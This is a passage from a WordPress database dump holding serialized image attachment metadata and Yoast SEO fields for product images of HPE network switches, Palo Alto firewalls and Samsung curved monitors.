:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"HPE-FlexNetwork-MSR93x-Router-Series-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3113,2523,'_wp_attached_file','2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png'),(3114,2523,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:320;s:6:\"height\";i:240;s:4:\"file\";s:74:\"2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:74:\"HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:74:\"HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:74:\"HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:72:\"HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3115,2524,'_wp_attached_file','2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png'),(3116,2524,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:71:\"2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:71:\"HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:71:\"HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:71:\"HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:71:\"HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:71:\"HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:71:\"HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:69:\"HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3120,2528,'_wp_attached_file','2018/12/PA-5250.jpg'),(3121,2528,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:440;s:6:\"height\";i:196;s:4:\"file\";s:19:\"2018/12/PA-5250.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"PA-5250-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"PA-5250-300x134.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"PA-5250-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"PA-5250-20x9.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:9;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:15:\"2014 Miles Keep\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3122,1569,'_yoast_wpseo_content_score','60'),(3123,2529,'_wp_attached_file','2018/12/PA-7000.jpg'),(3124,2529,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:368;s:6:\"height\";i:325;s:4:\"file\";s:19:\"2018/12/PA-7000.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"PA-7000-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"PA-7000-300x265.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"PA-7000-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"PA-7000-368x300.jpg\";s:5:\"width\";i:368;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"PA-7000-20x18.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3129,2532,'_wp_attached_file','2018/12/32-CJG5-Curved-Gaming-Monitor.png'),(3130,2532,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:462;s:4:\"file\";s:41:\"2018/12/32-CJG5-Curved-Gaming-Monitor.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"32-CJG5-Curved-Gaming-Monitor-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"32-CJG5-Curved-Gaming-Monitor-300x289.png\";s:5:\"width\";i:300;s:6:\"height\";i:289;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:41:\"32-CJG5-Curved-Gaming-Monitor-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:41:\"32-CJG5-Curved-Gaming-Monitor-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:41:\"32-CJG5-Curved-Gaming-Monitor-480x400.png\";s:5:\"width\";i:480;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:39:\"32-CJG5-Curved-Gaming-Monitor-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3127,2531,'_wp_attached_file','2018/12/PA-5000.jpg'),(3128,2531,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:595;s:6:\"height\";i:205;s:4:\"file\";s:19:\"2018/12/PA-5000.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"PA-5000-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"PA-5000-300x103.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"PA-5000-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"PA-5000-480x205.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"PA-5000-20x7.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3131,2533,'_wp_attached_file','2018/12/24-Curved-Gaming-Monitor-CFG73.png'),(3132,2533,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:453;s:6:\"height\";i:480;s:4:\"file\";s:42:\"2018/12/24-Curved-Gaming-Monitor-CFG73.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"24-Curved-Gaming-Monitor-CFG73-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"24-Curved-Gaming-Monitor-CFG73-283x300.png\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:42:\"24-Curved-Gaming-Monitor-CFG73-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:42:\"24-Curved-Gaming-Monitor-CFG73-453x300.png\";s:5:\"width\";i:453;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:42:\"24-Curved-Gaming-Monitor-CFG73-453x400.png\";s:5:\"width\";i:453;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:40:\"24-Curved-Gaming-Monitor-CFG73-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3133,2534,'_wp_attached_file','2018/12/34-Curved-Widescreen-Monitor.png'),(3134,2534,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:634;s:6:\"height\";i:435;s:4:\"file\";s:40:\"2018/12/34-Curved-Widescreen-Monitor.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"34-Curved-Widescreen-Monitor-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"34-Curved-Widescreen-Monitor-300x206.png\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:40:\"34-Curved-Widescreen-Monitor-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:40:\"34-Curved-Widescreen-Monitor-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:40:\"34-Curved-Widescreen-Monitor-634x400.png\";s:5:\"width\";i:634;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:38:\"34-Curved-Widescreen-Monitor-20x14.png\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3135,2535,'_wp_attached_file','2018/12/32-Curved-LED-Monitor.png'),(3136,2535,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:645;s:6:\"height\";i:461;s:4:\"file\";s:33:\"2018/12/32-Curved-LED-Monitor.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"32-Curved-LED-Monitor-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"32-Curved-LED-Monitor-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"32-Curved-LED-Monitor-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"32-Curved-LED-Monitor-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:33:\"32-Curved-LED-Monitor-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"32-Curved-LED-Monitor-20x14.png\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3137,2536,'_wp_attached_file','2018/12/32-Curved-Monitor.png'),(3138,2536,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:619;s:6:\"height\";i:470;s:4:\"file\";s:29:\"2018/12/32-Curved-Monitor.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"32-Curved-Monitor-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"32-Curved-Monitor-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"32-Curved-Monitor-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"32-Curved-Monitor-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:29:\"32-Curved-Monitor-619x400.png\";s:5:\"width\";i:619;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:27:\"32-Curved-Monitor-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3139,2537,'_wp_attached_file','2018/12/49-QLED-Gaming-Monitor-CHG90.png'),(3140,2537,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:672;s:6:\"height\";i:355;s:4:\"file\";s:40:\"2018/12/49-QLED-Gaming-Monitor-CHG90.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"49-QLED-Gaming-Monitor-CHG90-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"49-QLED-Gaming-Monitor-CHG90-300x158.png\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:40:\"49-QLED-Gaming-Monitor-CHG90-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:40:\"49-QLED-Gaming-Monitor-CHG90-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:40:\"49-QLED-Gaming-Monitor-CHG90-640x355.png\";s:5:\"width\";i:640;s:6:\"height\";i:355;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:38:\"49-QLED-Gaming-Monitor-CHG90-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3141,1580,'_yoast_wpseo_content_score','60'),(3142,2538,'_wp_attached_file','2018/12/PA-3200.jpg'),(3143,2538,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:374;s:6:\"height\";i:135;s:4:\"file\";s:19:\"2018/12/PA-3200.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"PA-3200-150x135.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"PA-3200-300x108.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"PA-3200-300x135.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"PA-3200-20x7.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3144,2539,'_wp_attached_file','2018/12/PA-3000.png'),(3145,2539,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:616;s:6:\"height\";i:195;s:4:\"file\";s:19:\"2018/12/PA-3000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"PA-3000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"PA-3000-300x95.png\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"PA-3000-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"PA-3000-480x195.png\";s:5:\"width\";i:480;s:6:\"height\";i:195;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"PA-3000-20x6.png\";s:5:\"width\";i:20;s:6:\"height\";i:6;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3146,1580,'_yoast_wpseo_focuskw','samsung'),(3147,1580,'_yoast_wpseo_metadesc','SAMSUNG MONITOR, IMMERSIVE EXPERIENCE Discover the big, bold panoramic views that curved screens deliver.EXCELLENCE IN WOK & PLAY, Enjoy a more Immersive Entertainment Experience through Samsungâ€™s Versatile High-Resolution Monitors'),(3148,1580,'_yoast_wpseo_linkdex','67'),(3149,2541,'_wp_attached_file','2018/12/PA-800.jpg'),(3150,2541,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:440;s:6:\"height\";i:150;s:4:\"file\";s:18:\"2018/12/PA-800.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"PA-800-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"PA-800-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"PA-800-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:15:\"PA-800-20x7.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:15:\"2014 Miles Keep\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3151,2542,'_wp_attached_file','2018/12/PA500_FT.jpg'),(3152,2542,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:123;s:4:\"file\";s:20:\"2018/12/PA500_FT.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"PA500_FT-150x123.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"PA500_FT-300x53.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"PA500_FT-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"PA500_FT-480x123.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s: